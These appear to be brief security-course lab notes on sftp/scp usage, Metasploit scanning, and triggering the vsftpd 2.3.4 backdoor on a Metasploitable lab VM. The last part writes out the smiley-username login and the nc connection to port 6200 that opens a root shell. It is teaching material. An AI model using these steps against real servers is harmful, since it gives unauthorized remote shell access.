Notes: 10/17/19

sudo vulnerability

ftp/sftp                                                                        
sftp> ls                                                          
sftp> !ls
sftp> cd public_html/
sftp> ls
sftp> lcd public_html
sftp> !pwd
sftp> get test.html
sftp> bye

Secure Copy
scp <src> <target>

scp://user@host:port/path
-OR-
host:path

scp ftp.gettysburg.edu:~/public_html/test.html .

Metasploit:

//scan subnet
db_nmap -A 192.168.56.0/24
services

https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html

Kali:
run wireshark and capture the communication from the exploit

Workstation:
- use ftp to connect to metasploitable
cs17:~$ ftp 192.168.56.7
Connected to 192.168.56.7.
220 (vsFTPd 2.3.4)
Name (192.168.56.7:cpresser): kcV:)
331 Please specify the password.
Password:

- use nc to connect to the backdoor shell it creates

cs17:~$ nc 192.168.56.7 6200
ls